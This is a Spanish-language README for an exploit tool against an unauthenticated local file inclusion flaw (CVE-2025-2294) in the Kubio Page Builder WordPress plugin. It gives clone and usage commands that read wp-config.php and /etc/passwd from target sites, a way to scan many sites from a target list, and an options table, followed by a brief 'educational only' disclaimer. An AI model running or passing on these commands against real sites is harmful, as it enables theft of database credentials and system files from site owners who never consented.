
Exploit de Inclusión Local de Archivos (LFI) para el plugin de WordPress Kubio Page Builder (versiones ≤ 2.5.1).
Esta herramienta explota una vulnerabilidad LFI no autenticada en el plugin Kubio Page Builder (CVE-2025-2294), permitiendo a los atacantes leer archivos sensibles en instalaciones de WordPress vulnerables.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Esta herramienta es solo para fines educativos. El desarrollador no es responsable de ningún uso indebido. Obtenga siempre la autorización adecuada antes de probar cualquier sistema.
| Opción | Descripción |
|---|
-u, --url | URL de un solo objetivo |
-l, --list | Archivo que contiene la lista de objetivos |
-f, --file | Archivo a leer (por defecto: /etc/passwd) |
-o, --output | Guardar objetivos vulnerables en un archivo |